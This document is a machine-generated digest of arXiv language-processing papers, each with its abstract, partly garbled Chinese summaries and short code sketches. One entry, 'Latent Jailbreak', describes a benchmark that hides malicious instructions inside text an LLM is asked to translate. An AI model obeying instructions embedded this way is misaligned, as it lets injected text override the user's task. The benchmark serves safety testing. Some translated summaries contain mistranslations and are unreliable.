  • results: 实验结果表明,提出的方法可以在两个数据集上提高 BLEU 分数,尤其是在语言对的 sintactic 差异较大的翻译任务中获得更大的改善。
    Abstract Syntax has been proven to be remarkably effective in neural machine translation (NMT). Previous models obtained syntax information from syntactic parsing tools and integrated it into NMT models to improve translation performance. In this work, we propose a method to incorporate syntax information into a complex-valued Encoder-Decoder architecture. The proposed model jointly learns word-level and syntax-level attention scores from the source side to the target side using an attention mechanism. Importantly, it is not dependent on specific network architectures and can be directly integrated into any existing sequence-to-sequence (Seq2Seq) framework. The experimental results demonstrate that the proposed method can bring significant improvements in BLEU scores on two datasets. In particular, the proposed method achieves a greater improvement in BLEU scores in translation tasks involving language pairs with significant syntactic differences.
    摘要 句法信息已被证明在神经机器翻译(NMT)中非常有效。以往的模型从句法分析工具中获取句法信息,并将其整合进 NMT 模型以提升翻译性能。在这项工作中,我们提出一种将句法信息融入复数值 Encoder-Decoder 架构的方法。所提模型通过注意力机制,联合学习从源端到目标端的词级与句法级注意力分数。重要的是,该方法不依赖特定的网络架构,可以直接集成到任何现有的序列到序列(Seq2Seq)框架中。实验结果表明,所提方法能在两个数据集上带来显著的 BLEU 分数提升;尤其在句法差异较大的语言对的翻译任务中,改进幅度更大。
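
As a loose illustration of combining word-level and syntax-level attention with complex-valued representations (an interpretation of the abstract, not the authors' architecture), the sketch below scores a decoder query against two sets of complex-valued keys and merges the scores before the softmax.

```python
# Hedged toy sketch: attention weights from complex-valued representations,
# with a word-level and a syntax-level score combined per source position.
import numpy as np

def softmax(z):
    e = np.exp(z - z.max())
    return e / e.sum()

def complex_score(q, K):
    # real part of the Hermitian inner product <q, k_i> for every key k_i
    return np.real(K.conj() @ q)

rng = np.random.default_rng(0)
d, src_len = 8, 5
q = rng.normal(size=d) + 1j * rng.normal(size=d)                         # decoder query
K_word = rng.normal(size=(src_len, d)) + 1j * rng.normal(size=(src_len, d))
K_syntax = rng.normal(size=(src_len, d)) + 1j * rng.normal(size=(src_len, d))

alpha = softmax(complex_score(q, K_word) + complex_score(q, K_syntax))
print(np.round(alpha, 3))   # joint word- and syntax-level attention weights
```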

The Resume Paradox: Greater Language Differences, Smaller Pay Gaps

  • paper_url: http://arxiv.org/abs/2307.08580
  • repo_url: None
  • paper_authors: Joshua R. Minot, Marc Maier, Bradford Demarest, Nicholas Cheney, Christopher M. Danforth, Peter Sheridan Dodds, Morgan R. Frank
  • for: 这种研究旨在探讨工作者自我表达如何影响 gender pay gap.
  • methods: 研究使用美国工作者数百万个简历语言分析gender pay gap.
  • results: 研究发现,各职业中男女简历的语言差异可解释性别薪酬差距约 11% 的变异;令人意外的是,简历语言差异越大的行业,性别薪酬差距反而越小——语言差异翻一番,对应普通女性员工的年薪提高约 2,797 美元。
    Abstract Over the past decade, the gender pay gap has remained steady with women earning 84 cents for every dollar earned by men on average. Many studies explain this gap through demand-side bias in the labor market represented through employers' job postings. However, few studies analyze potential bias from the worker supply-side. Here, we analyze the language in millions of US workers' resumes to investigate how differences in workers' self-representation by gender compare to differences in earnings. Across US occupations, language differences between male and female resumes correspond to 11% of the variation in gender pay gap. This suggests that females' resumes that are semantically similar to males' resumes may have greater wage parity. However, surprisingly, occupations with greater language differences between male and female resumes have lower gender pay gaps. A doubling of the language difference between female and male resumes results in an annual wage increase of $2,797 for the average female worker. This result holds with controls for gender-biases of resume text and we find that per-word bias poorly describes the variance in wage gap. The results demonstrate that textual data and self-representation are valuable factors for improving worker representations and understanding employment inequities.
    摘要 We find that language differences between male and female resumes account for 11% of the variation in the gender pay gap. Specifically, we find that female resumes that are semantically similar to male resumes are associated with greater wage parity. However, surprisingly, occupations with greater language differences between male and female resumes have lower gender pay gaps.Furthermore, we find that a doubling of the language difference between female and male resumes results in an annual wage increase of $2,797 for the average female worker. This result holds even when controlling for gender-biases of resume text, and we find that per-word bias poorly describes the variance in wage gap.Overall, our results demonstrate that textual data and self-representation are valuable factors for improving worker representations and understanding employment inequities.

Discovering collective narratives shifts in online discussions

  • paper_url: http://arxiv.org/abs/2307.08541
  • repo_url: None
  • paper_authors: Wanying Zhao, Fiona Guo, Kristina Lerman, Yong-Yeol Ahn
  • for: This paper aims to develop a systematic and computational understanding of online narratives, specifically in the context of social media, to better understand how they emerge, spread, and die.
  • methods: The proposed framework combines change point detection, semantic role labeling (SRL), and automatic aggregation of narrative fragments into narrative networks to reliably and automatically extract narratives from massive amounts of text data.
  • results: The proposed approach is evaluated using synthetic and empirical data from two Twitter corpora related to COVID-19 and the 2017 French Election, and the results demonstrate that the approach can recover major narrative shifts that correspond to significant events.
  • for: 这篇论文目的是为了提供一种系统的计算机理解社交媒体上的故事,以更好地理解它们如何出现、传播和消亡。
  • methods: 该提议的框架结合变化点检测、Semantic Role Labeling(SRL)和自动聚合故事片断到故事网络,以可靠地和自动地从大量文本数据中提取故事。
  • results: 该提议的方法在使用生成的和实际数据两个Twitter corpora相关于COVID-19和2017法国大选进行评估,结果表明该方法可以回归主要的故事变化,与主要事件相吻合。
    Abstract Narrative is a foundation of human cognition and decision making. Because narratives play a crucial role in societal discourses and spread of misinformation and because of the pervasive use of social media, the narrative dynamics on social media can have profound societal impact. Yet, systematic and computational understanding of online narratives faces critical challenge of the scale and dynamics; how can we reliably and automatically extract narratives from massive amount of texts? How do narratives emerge, spread, and die? Here, we propose a systematic narrative discovery framework that fill this gap by combining change point detection, semantic role labeling (SRL), and automatic aggregation of narrative fragments into narrative networks. We evaluate our model with synthetic and empirical data two-Twitter corpora about COVID-19 and 2017 French Election. Results demonstrate that our approach can recover major narrative shifts that correspond to the major events.
    摘要 叙述是人类认知和决策的基础。因为叙述在社会话语中发挥重要作用,并且在社会媒体上广泛传播谣言,因此在社会媒体上的叙述动态可能有深远的社会影响。然而,系统化和计算化地理解社会媒体上的叙述遇到了重要的挑战,即如何可靠地和自动地提取叙述?叙述是如何产生、传播和死亡的?我们提出了一个系统的叙述发现框架,通过结合变点检测、semantic role labeling(SRL)和自动聚合叙述碎片而填补这个空白。我们使用了两个Twitter数据集,一个是关于COVID-19的,另一个是关于2017年法国大选。结果表明,我们的方法可以重现主要的叙述变化,与主要事件相吻合。
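
The framework's change-point stage can be pictured with a very small stand-in: the CUSUM-style statistic below locates a shift in the daily frequency of one narrative fragment. The real system combines change-point detection with SRL and narrative-network aggregation; the series and method here are illustrative assumptions only.

```python
# Simple stand-in for the change-point step: locate a shift in a count series.
import numpy as np

def cusum_change_point(series):
    x = np.asarray(series, dtype=float)
    s = np.cumsum(x - x.mean())          # cumulative deviation from the mean
    return int(np.argmax(np.abs(s)))     # index of the most likely shift

daily_counts = [3, 4, 2, 3, 5, 4, 18, 22, 19, 25, 21]   # toy fragment frequencies
print(cusum_change_point(daily_counts))                 # ~5/6: onset of the new narrative
```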

Large-Scale Evaluation of Topic Models and Dimensionality Reduction Methods for 2D Text Spatialization

  • paper_url: http://arxiv.org/abs/2307.11770
  • repo_url: https://github.com/cgshpi/topic-models-and-dimensionality-reduction-benchmark
  • paper_authors: Daniel Atzberger, Tim Cech, Willy Scheibel, Matthias Trapp, Rico Richter, Jürgen Döllner, Tobias Schreck
  • For: The paper derives spatializations for text corpora using topic models and dimensionality reduction methods, and evaluates how effective these methods are at creating high-quality layouts.
  • Methods: The paper uses combinations of topic models and dimensionality reduction methods, including Latent Dirichlet Allocation (LDA) and t-Distributed Stochastic Neighbor Embedding (t-SNE), to create two-dimensional scatter plots of text corpora.
  • Results: The paper presents a large-scale computational evaluation of the effectiveness of these methods, using a set of corpora and quality metrics to quantify the preservation of local and global properties and the perceptual effectiveness of the resulting layouts. The results show that interpretable topic models are beneficial for capturing the structure of text corpora, and that t-SNE is a good choice for subsequent dimensionality reduction.
    Abstract Topic models are a class of unsupervised learning algorithms for detecting the semantic structure within a text corpus. Together with a subsequent dimensionality reduction algorithm, topic models can be used for deriving spatializations for text corpora as two-dimensional scatter plots, reflecting semantic similarity between the documents and supporting corpus analysis. Although the choice of the topic model, the dimensionality reduction, and their underlying hyperparameters significantly impact the resulting layout, it is unknown which particular combinations result in high-quality layouts with respect to accuracy and perception metrics. To investigate the effectiveness of topic models and dimensionality reduction methods for the spatialization of corpora as two-dimensional scatter plots (or basis for landscape-type visualizations), we present a large-scale, benchmark-based computational evaluation. Our evaluation consists of (1) a set of corpora, (2) a set of layout algorithms that are combinations of topic models and dimensionality reductions, and (3) quality metrics for quantifying the resulting layout. The corpora are given as document-term matrices, and each document is assigned to a thematic class. The chosen metrics quantify the preservation of local and global properties and the perceptual effectiveness of the two-dimensional scatter plots. By evaluating the benchmark on a computing cluster, we derived a multivariate dataset with over 45 000 individual layouts and corresponding quality metrics. Based on the results, we propose guidelines for the effective design of text spatializations that are based on topic models and dimensionality reductions. As a main result, we show that interpretable topic models are beneficial for capturing the structure of text corpora. We furthermore recommend the use of t-SNE as a subsequent dimensionality reduction.
    摘要 主题模型(topic models)是一类用于挖掘文本语料内部语义结构的无监督学习算法。与后续的降维算法结合,主题模型可用于将文本语料空间化为二维散点图,反映文档之间的语义相似度并支持语料分析。尽管主题模型、降维方法及其超参数的选择会显著影响最终布局,但究竟哪些组合能在准确性和感知指标上得到高质量布局仍不清楚。为考察主题模型与降维方法在将语料空间化为二维散点图(或作为地景式可视化基础)上的有效性,我们开展了一项大规模、基于基准的计算评估。评估包括:(1) 一组语料;(2) 一组由主题模型与降维方法组合而成的布局算法;(3) 用于量化布局质量的指标。语料以文档-词项矩阵给出,每篇文档被赋予一个主题类别;所选指标量化局部与全局性质的保持程度以及二维散点图的感知有效性。通过在计算集群上运行该基准,我们得到了包含 45,000 多个布局及其质量指标的多变量数据集。基于这些结果,我们提出了基于主题模型与降维的文本空间化的有效设计准则。主要结论是:可解释的主题模型有利于刻画文本语料的结构;我们还推荐使用 t-SNE 作为后续降维方法。
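
A minimal version of one layout algorithm from the benchmarked family — an interpretable topic model (LDA) followed by t-SNE — can be written with scikit-learn as below. The tiny corpus and hyperparameters are placeholders; the benchmark itself sweeps many such combinations and scores them with layout-quality metrics.

```python
# Minimal spatialization pipeline: document-term matrix -> LDA topics -> t-SNE layout.
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.decomposition import LatentDirichletAllocation
from sklearn.manifold import TSNE

docs = [
    "graph neural networks for molecules",
    "transformers for machine translation",
    "topic models for corpus exploration",
    "reinforcement learning for robotics",
] * 10   # tiny stand-in corpus

dtm = CountVectorizer().fit_transform(docs)                  # document-term matrix
topics = LatentDirichletAllocation(n_components=4, random_state=0).fit_transform(dtm)
layout = TSNE(n_components=2, perplexity=5, random_state=0).fit_transform(topics)
print(layout.shape)   # (len(docs), 2) scatter-plot coordinates, one point per document
```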

Latent Jailbreak: A Test Suite for Evaluating Both Text Safety and Output Robustness of Large Language Models

  • paper_url: http://arxiv.org/abs/2307.08487
  • repo_url: https://github.com/qiuhuachuan/latent-jailbreak
  • paper_authors: Huachuan Qiu, Shuai Zhang, Anqi Li, Hongliang He, Zhenzhong Lan
  • for: 这种论文旨在评估大语言模型(LLM)是否能够遵循人类价值观和生成安全文本。
  • methods: 作者提出了一个新的评估标准,以评估 LLM 的安全性和可靠性。该标准包括使用潜在的监禁提示集,以评估模型在完成任务时的 robustness。
  • results: 研究发现,当前的 LLM 不仅会优先使用某些指令词,还会在不同的指令词上 exhibit 不同的监禁率。
    Abstract Considerable research efforts have been devoted to ensuring that large language models (LLMs) align with human values and generate safe text. However, an excessive focus on sensitivity to certain topics can compromise the model's robustness in following instructions, thereby impacting its overall performance in completing tasks. Previous benchmarks for jailbreaking LLMs have primarily focused on evaluating the safety of the models without considering their robustness. In this paper, we propose a benchmark that assesses both the safety and robustness of LLMs, emphasizing the need for a balanced approach. To comprehensively study text safety and output robustness, we introduce a latent jailbreak prompt dataset, each involving malicious instruction embedding. Specifically, we instruct the model to complete a regular task, such as translation, with the text to be translated containing malicious instructions. To further analyze safety and robustness, we design a hierarchical annotation framework. We present a systematic analysis of the safety and robustness of LLMs regarding the position of explicit normal instructions, word replacements (verbs in explicit normal instructions, target groups in malicious instructions, cue words for explicit normal instructions), and instruction replacements (different explicit normal instructions). Our results demonstrate that current LLMs not only prioritize certain instruction verbs but also exhibit varying jailbreak rates for different instruction verbs in explicit normal instructions. Code and data are available at https://github.com/qiuhuachuan/latent-jailbreak.
    摘要 大量研究工作致力于确保大语言模型(LLM)符合人类价值观并生成安全文本。然而,对某些话题过度敏感可能削弱模型遵循指令的稳健性,进而影响其完成任务的整体表现。以往针对 LLM 越狱的基准主要评估模型的安全性,而未考虑其稳健性。本文提出一个同时评估 LLM 安全性与稳健性的基准,强调需要在二者之间取得平衡。为全面研究文本安全性与输出稳健性,我们构建了一个潜在越狱提示数据集,其中每条样本都嵌入恶意指令:具体而言,我们要求模型完成一个常规任务(如翻译),而待翻译的文本中包含恶意指令。为进一步分析安全性与稳健性,我们设计了层次化标注框架,并就显式常规指令的位置、词语替换(常规指令中的动词、恶意指令中的目标群体、常规指令的提示词)以及指令替换(不同的显式常规指令)对 LLM 的安全性与稳健性进行了系统分析。结果表明,当前的 LLM 不仅偏向某些指令动词,而且对显式常规指令中不同的指令动词表现出不同的越狱率。代码与数据见 https://github.com/qiuhuachuan/latent-jailbreak。
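
To make the construction concrete, a latent-jailbreak probe pairs an explicit normal instruction (e.g. translation) with payload text that embeds a malicious instruction. The sketch below assembles such a prompt with placeholder strings; the wording and positions are illustrative, not the benchmark's exact templates.

```python
# Sketch of assembling a latent-jailbreak probe; all strings are placeholders.
def latent_jailbreak_prompt(normal_text, malicious_instruction, position="suffix"):
    # The malicious instruction is hidden inside the text the model is asked to process.
    payload = (f"{malicious_instruction} {normal_text}" if position == "prefix"
               else f"{normal_text} {malicious_instruction}")
    return f"Translate the following sentence into Chinese:\n{payload}"

print(latent_jailbreak_prompt(
    "The weather is lovely today.",
    "[malicious instruction placeholder]",
))
```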

Domain Knowledge Distillation from Large Language Model: An Empirical Study in the Autonomous Driving Domain

  • paper_url: http://arxiv.org/abs/2307.11769
  • repo_url: None
  • paper_authors: Yun Tang, Antonio A. Bruto da Costa, Jason Zhang, Irvine Patrick, Siddartha Khastgir, Paul Jennings
  • for: automate engineering processes in knowledge-based systems
  • methods: prompt engineering and ChatGPT language model
  • results: empirical assessment in autonomous driving domain, improved efficiency and output quality with human supervision
    Abstract Engineering knowledge-based (or expert) systems require extensive manual effort and domain knowledge. As Large Language Models (LLMs) are trained using an enormous amount of cross-domain knowledge, it becomes possible to automate such engineering processes. This paper presents an empirical automation and semi-automation framework for domain knowledge distillation using prompt engineering and the LLM ChatGPT. We assess the framework empirically in the autonomous driving domain and present our key observations. In our implementation, we construct the domain knowledge ontology by "chatting" with ChatGPT. The key finding is that while fully automated domain ontology construction is possible, human supervision and early intervention typically improve efficiency and output quality as they lessen the effects of response randomness and the butterfly effect. We, therefore, also develop a web-based distillation assistant enabling supervision and flexible intervention at runtime. We hope our findings and tools could inspire future research toward revolutionizing the engineering of knowledge-based systems across application domains.
    摘要 基于知识(或专家)系统的工程化需要大量人工投入和领域知识。由于大语言模型(LLM)是在海量跨领域知识上训练的,自动化这类工程过程成为可能。本文提出一个利用提示工程与 LLM ChatGPT 进行领域知识蒸馏的自动化与半自动化实证框架。我们在自动驾驶领域对该框架进行了实证评估,并给出关键观察。在我们的实现中,领域知识本体是通过与 ChatGPT“聊天”构建的。核心发现是:虽然完全自动化的领域本体构建是可行的,但人工监督与早期干预通常能提升效率与输出质量,因为它们可以减轻回复随机性与蝴蝶效应的影响。为此,我们还开发了一个基于 Web 的蒸馏助手,支持在运行时进行监督和灵活干预。我们希望这些发现与工具能够启发未来的研究,推动各应用领域中知识系统工程方式的变革。

Improving End-to-End Speech Translation by Imitation-Based Knowledge Distillation with Synthetic Transcripts

  • paper_url: http://arxiv.org/abs/2307.08426
  • repo_url: https://github.com/hubreb/imitkd_ast
  • paper_authors: Rebekka Hubert, Artem Sokolov, Stefan Riezler
  • for: This paper focuses on improving end-to-end automatic speech translation (AST) systems by using imitation learning to correct errors made by a student model.
  • methods: The authors use a teacher NMT system to correct the errors of an AST student model without relying on manual transcripts.
  • results: The NMT teacher is able to recover from errors in automatic transcriptions and correct erroneous translations of the AST student, leading to improvements of about 4 BLEU points over the standard AST end-to-end baseline on two datasets.
  • for: 这篇论文关注改进端到端自动语音翻译(AST)系统,使用模仿学习方法来更正学生模型中的错误。
  • methods: 作者使用一个教师NMT系统来更正学生AST模型中的错误,而不需要人工译文。
  • results: NMT教师能够从自动译文中恢复错误,并更正学生AST模型中的错误翻译,在两个数据集上提高约4个BLEU分。
    Abstract End-to-end automatic speech translation (AST) relies on data that combines audio inputs with text translation outputs. Previous work used existing large parallel corpora of transcriptions and translations in a knowledge distillation (KD) setup to distill a neural machine translation (NMT) into an AST student model. While KD allows using larger pretrained models, the reliance of previous KD approaches on manual audio transcripts in the data pipeline restricts the applicability of this framework to AST. We present an imitation learning approach where a teacher NMT system corrects the errors of an AST student without relying on manual transcripts. We show that the NMT teacher can recover from errors in automatic transcriptions and is able to correct erroneous translations of the AST student, leading to improvements of about 4 BLEU points over the standard AST end-to-end baseline on the English-German CoVoST-2 and MuST-C datasets, respectively. Code and data are publicly available.\footnote{\url{https://github.com/HubReb/imitkd_ast/releases/tag/v1.1}
    摘要 端到端自动语音翻译(AST)依赖于将音频输入与文本翻译输出配对的数据。以往工作在知识蒸馏(KD)设置下利用现有的大规模转写-翻译平行语料,将神经机器翻译(NMT)模型蒸馏到 AST 学生模型中。虽然 KD 能够利用更大的预训练模型,但以往 KD 方法在数据流程中依赖人工音频转写,限制了该框架在 AST 上的适用性。我们提出一种模仿学习方法:由 NMT 教师系统纠正 AST 学生模型的错误,而无需人工转写。我们表明,NMT 教师能够从自动转写的错误中恢复,并纠正 AST 学生的错误翻译,在英德 CoVoST-2 与 MuST-C 数据集上分别比标准的端到端 AST 基线提升约 4 个 BLEU 点。代码与数据公开于 https://github.com/HubReb/imitkd_ast/releases/tag/v1.1。

Enhancing Supervised Learning with Contrastive Markings in Neural Machine Translation Training

  • paper_url: http://arxiv.org/abs/2307.08416
  • repo_url: None
  • paper_authors: Nathaniel Berger, Miriam Exel, Matthias Huck, Stefan Riezler
  • for: 提高 neural machine translation(NMT)中的监督学习过程中的探索性能力
  • methods: 使用对比标记目标来提供自动生成的增强训练信号,对比系统假设与参考文本进行比较,并对正确/错误字符进行权重调整
  • results: 训练 WITH contrastive markings 可以提高 NMT 的性能,特别是在学习从 postedits 中的情况下,contrastive markings 可以指示人工错误纠正。
    Abstract Supervised learning in Neural Machine Translation (NMT) typically follows a teacher forcing paradigm where reference tokens constitute the conditioning context in the model's prediction, instead of its own previous predictions. In order to alleviate this lack of exploration in the space of translations, we present a simple extension of standard maximum likelihood estimation by a contrastive marking objective. The additional training signals are extracted automatically from reference translations by comparing the system hypothesis against the reference, and used for up/down-weighting correct/incorrect tokens. The proposed new training procedure requires one additional translation pass over the training set per epoch, and does not alter the standard inference setup. We show that training with contrastive markings yields improvements on top of supervised learning, and is especially useful when learning from postedits where contrastive markings indicate human error corrections to the original hypotheses. Code is publicly released.
    摘要 神经机器翻译(NMT)中的监督学习通常采用 teacher forcing 范式:模型预测所依赖的条件上下文是参考译文的词元,而不是模型自身先前的预测。为缓解这种在译文空间中缺乏探索的问题,我们提出对标准最大似然估计的一个简单扩展——对比标记(contrastive marking)目标。额外的训练信号通过把系统假设与参考译文进行比较而自动抽取,并用于对正确/错误词元进行升权/降权。所提的新训练流程每个 epoch 只需对训练集额外执行一次翻译,且不改变标准的推理设置。实验表明,使用对比标记进行训练能在监督学习的基础上带来进一步提升;在从 post-edit 数据中学习时尤其有用,因为此时对比标记指示了人工对原始假设的纠错。代码已公开。
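
One way to read the contrastive-marking objective is as a token-level re-weighting of the loss: tokens marked correct against the reference are up-weighted and the rest down-weighted. The PyTorch sketch below is a simplified interpretation under that assumption (the weights, shapes, and marking source are illustrative), not the authors' implementation.

```python
# Hedged sketch: token-level cross-entropy re-weighted by contrastive markings.
import torch
import torch.nn.functional as F

def marked_nll(logits, targets, is_correct, up=1.5, down=0.5):
    # logits: (seq, vocab); targets: (seq,); is_correct: (seq,) boolean markings.
    per_token = F.cross_entropy(logits, targets, reduction="none")
    weights = torch.where(is_correct,
                          torch.full_like(per_token, up),
                          torch.full_like(per_token, down))
    return (weights * per_token).mean()

seq, vocab = 6, 100
logits = torch.randn(seq, vocab, requires_grad=True)
targets = torch.randint(vocab, (seq,))
marks = torch.tensor([1, 1, 0, 1, 0, 1], dtype=torch.bool)   # illustrative markings
loss = marked_nll(logits, targets, marks)
loss.backward()
print(float(loss))
```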

On the application of Large Language Models for language teaching and assessment technology

  • paper_url: http://arxiv.org/abs/2307.08393
  • repo_url: None
  • paper_authors: Andrew Caines, Luca Benedetto, Shiva Taslimipoor, Christopher Davis, Yuan Gao, Oeistein Andersen, Zheng Yuan, Mark Elliott, Russell Moore, Christopher Bryant, Marek Rei, Helen Yannakoudakis, Andrew Mullooly, Diane Nicholls, Paula Buttery
  • for: 这个论文主要目的是研究大型自然语言处理模型在语言教学和评估系统中的应用潜力。
  • methods: 这篇论文使用了大型自然语言处理模型,包括PaLM和GPT-4,进行文本生成和自动评分等任务的研究。
  • results: 研究发现,大型语言模型可以在文本生成任务中提供更好的表现,但是在自动评分和语法错误检测任务中,它们并没有超越现有的state-of-the-art结果。
    Abstract The recent release of very large language models such as PaLM and GPT-4 has made an unprecedented impact in the popular media and public consciousness, giving rise to a mixture of excitement and fear as to their capabilities and potential uses, and shining a light on natural language processing research which had not previously received so much attention. The developments offer great promise for education technology, and in this paper we look specifically at the potential for incorporating large language models in AI-driven language teaching and assessment systems. We consider several research areas and also discuss the risks and ethical considerations surrounding generative AI in education technology for language learners. Overall we find that larger language models offer improvements over previous models in text generation, opening up routes toward content generation which had not previously been plausible. For text generation they must be prompted carefully and their outputs may need to be reshaped before they are ready for use. For automated grading and grammatical error correction, tasks whose progress is checked on well-known benchmarks, early investigations indicate that large language models on their own do not improve on state-of-the-art results according to standard evaluation metrics. For grading it appears that linguistic features established in the literature should still be used for best performance, and for error correction it may be that the models can offer alternative feedback styles which are not measured sensitively with existing methods. In all cases, there is work to be done to experiment with the inclusion of large language models in education technology for language learners, in order to properly understand and report on their capacities and limitations, and to ensure that foreseeable risks such as misinformation and harmful bias are mitigated.
    摘要 Recently released large language models such as PaLM and GPT-4 have caused a stir in popular media and public consciousness, with both excitement and fear about their capabilities and potential uses. This has shone a light on natural language processing research, which had not previously received so much attention. These developments offer great promise for education technology, and in this paper we explore the potential for incorporating large language models in AI-driven language teaching and assessment systems. We examine several research areas and also discuss the risks and ethical considerations surrounding generative AI in education technology for language learners.We find that larger language models offer improvements over previous models in text generation, opening up new possibilities for content generation. However, for text generation, careful prompting is necessary, and the outputs may need to be reshaped before they are ready for use. In terms of automated grading and grammatical error correction, early investigations suggest that large language models on their own do not improve on state-of-the-art results according to standard evaluation metrics. For grading, it appears that linguistic features established in the literature should still be used for best performance, and for error correction, the models may offer alternative feedback styles that are not measured sensitively with existing methods.In all cases, there is work to be done to experiment with the inclusion of large language models in education technology for language learners, in order to properly understand and report on their capacities and limitations, and to mitigate foreseeable risks such as misinformation and harmful bias.

How do software citation formats evolve over time? A longitudinal analysis of R programming language packages

  • paper_url: http://arxiv.org/abs/2307.09390
  • repo_url: None
  • paper_authors: Yuzhuo Wang, Kai Li
  • for: 本研究旨在探讨软件引用的复杂性,以便更好地理解软件引用的政策和基础设施。
  • methods: 本研究使用长期数据集,对2021年和2022年所有R包的引用格式进行比较和分析,以了解R语言包的引用格式,这些包是开源软件家族中重要的成员,以及引用格式是如何发展起来的。
  • results: 研究发现,不同的文档类型下的引用格式存在差异,而且在不同时间点,Metadata元素在引用格式中的变化也存在差异。此外,研究还发现了软件纸引用的专业性。通过这项研究,我们希望能够为软件引用政策和基础设施提供更好的理解。
    Abstract Under the data-driven research paradigm, research software has come to play crucial roles in nearly every stage of scientific inquiry. Scholars are advocating for the formal citation of software in academic publications, treating it on par with traditional research outputs. However, software is hardly consistently cited: one software entity can be cited as different objects, and the citations can change over time. These issues, however, are largely overlooked in existing empirical research on software citation. To fill the above gaps, the present study compares and analyzes a longitudinal dataset of citation formats of all R packages collected in 2021 and 2022, in order to understand the citation formats of R-language packages, important members in the open-source software family, and how the citations evolve over time. In particular, we investigate the different document types underlying the citations and what metadata elements in the citation formats changed over time. Furthermore, we offer an in-depth analysis of the disciplinarity of journal articles cited as software (software papers). By undertaking this research, we aim to contribute to a better understanding of the complexities associated with software citation, shedding light on future software citation policies and infrastructure.
    摘要 在数据驱动的研究范式下,研究软件已在科学研究的几乎每个阶段发挥关键作用。学界正在倡导在学术出版物中对软件进行正式引用,将其与传统研究成果同等对待。然而,软件的引用方式极不一致:同一软件实体可能被作为不同对象引用,且引用方式会随时间变化;这些问题在现有关于软件引用的实证研究中大多被忽视。为填补上述空白,本研究比较并分析了 2021 年与 2022 年收集的所有 R 包引用格式的纵向数据集,以理解开源软件家族的重要成员——R 语言包的引用格式及其随时间的演变。我们特别考察了引用所对应的不同文献类型,以及引用格式中哪些元数据元素随时间发生了变化;并对被作为软件引用的期刊论文(软件论文)的学科属性进行了深入分析。通过这项研究,我们希望加深对软件引用复杂性的理解,为未来的软件引用政策与基础设施提供参考。

Legal Syllogism Prompting: Teaching Large Language Models for Legal Judgment Prediction

  • paper_url: http://arxiv.org/abs/2307.08321
  • repo_url: None
  • paper_authors: Cong Jiang, Xiaolei Yang
  • for: 本研究旨在开发一种简单的提示方法,以教育大型自然语言处理模型(LLM)在法律推理中进行判断预测。
  • methods: 本研究使用“法律三段论提示”(Legal syllogism prompting,LoT)方法,只告诉模型:在法律三段论中,大前提是法律,小前提是事实,结论是判决。
  • results: 在 CAIL2018 中国刑事案例数据集上,我们使用 GPT-3 模型进行零样本判决预测实验。结果显示,采用 LoT 的 LLM 在多种推理任务上优于基线方法和链式思维提示方法。与其他方法相比,LoT 使模型能够专注于与判决相关的关键信息,并正确理解行为的法律含义。
    Abstract Legal syllogism is a form of deductive reasoning commonly used by legal professionals to analyze cases. In this paper, we propose legal syllogism prompting (LoT), a simple prompting method to teach large language models (LLMs) for legal judgment prediction. LoT teaches only that in the legal syllogism the major premise is law, the minor premise is the fact, and the conclusion is judgment. Then the models can produce a syllogism reasoning of the case and give the judgment without any learning, fine-tuning, or examples. On CAIL2018, a Chinese criminal case dataset, we performed zero-shot judgment prediction experiments with GPT-3 models. Our results show that LLMs with LoT achieve better performance than the baseline and chain of thought prompting, the state-of-art prompting method on diverse reasoning tasks. LoT enables the model to concentrate on the key information relevant to the judgment and to correctly understand the legal meaning of acts, as compared to other methods. Our method enables LLMs to predict judgment along with law articles and justification, which significantly enhances the explainability of models.
    摘要 法律三段论是法律从业者分析案件时常用的演绎推理形式。本文提出法律三段论提示(LoT):一种用于教会大语言模型(LLM)进行判决预测的简单提示方法。LoT 只告诉模型:在法律三段论中,大前提是法律,小前提是事实,结论是判决。模型据此即可生成案件的三段论推理并给出判决,而无需任何学习、微调或示例。在 CAIL2018 中国刑事案例数据集上,我们使用 GPT-3 模型进行零样本判决预测实验。结果显示,采用 LoT 的 LLM 表现优于基线方法以及链式思维提示这一在多种推理任务上最先进的提示方法。与其他方法相比,LoT 使模型能够专注于与判决相关的关键信息,并正确理解行为的法律含义。我们的方法使 LLM 能在预测判决的同时给出相应法条与理由,显著提升了模型的可解释性。
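
A prompt in the LoT style can be assembled as below; the wording and the example law/fact strings are paraphrased placeholders rather than the paper's exact template.

```python
# Sketch of a zero-shot legal-syllogism (LoT) style prompt:
# major premise = law, minor premise = facts, conclusion = judgment.
def lot_prompt(law_articles, case_facts):
    return (
        "Use a legal syllogism to decide this case.\n"
        f"Major premise (law): {law_articles}\n"
        f"Minor premise (facts): {case_facts}\n"
        "Conclusion (judgment):"
    )

print(lot_prompt(
    "Article 264: Whoever steals a relatively large amount of property ...",   # illustrative excerpt
    "The defendant took a mobile phone worth 4,000 yuan from a shop.",         # illustrative facts
))
```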

IterLara: A Turing Complete Algebra for Big Data, AI, Scientific Computing, and Database

  • paper_url: http://arxiv.org/abs/2307.08315
  • repo_url: None
  • paper_authors: Hongxiao Li, Wanling Gao, Lei Wang, Jianfeng Zhan
    for: This paper aims to provide an algebraic model that unifies operations in general-purpose computing, such as big data, AI, scientific computing, and database.methods: The paper proposes \textsc{IterLara}, an extension of \textsc{Lara} with iterative operators, to achieve this goal.results: The paper studies the expressive ability of \textsc{Lara} and \textsc{IterLara} and proves that \textsc{IterLara} with aggregation functions can represent matrix inversion and determinant. Additionally, the paper shows that \textsc{IterLara} with no limitation of function utility is Turing complete, and proposes the Operation Count (OP) as a metric of computation amount for \textsc{IterLara}.
    Abstract \textsc{Lara} is a key-value algebra that aims at unifying linear and relational algebra with three types of operation abstraction. The study of \textsc{Lara}'s expressive ability reports that it can represent relational algebra and most linear algebra operations. However, several essential computations, such as matrix inversion and determinant, cannot be expressed in \textsc{Lara}. \textsc{Lara} cannot represent global and iterative computation, either. This article proposes \textsc{IterLara}, extending \textsc{Lara} with iterative operators, to provide an algebraic model that unifies operations in general-purpose computing, like big data, AI, scientific computing, and database. We study the expressive ability of \textsc{Lara} and \textsc{IterLara} and prove that \textsc{IterLara} with aggregation functions can represent matrix inversion, determinant. Besides, we demonstrate that \textsc{IterLara} with no limitation of function utility is Turing complete. We also propose the Operation Count (OP) as a metric of computation amount for \textsc{IterLara} and ensure that the OP metric is in accordance with the existing computation metrics.
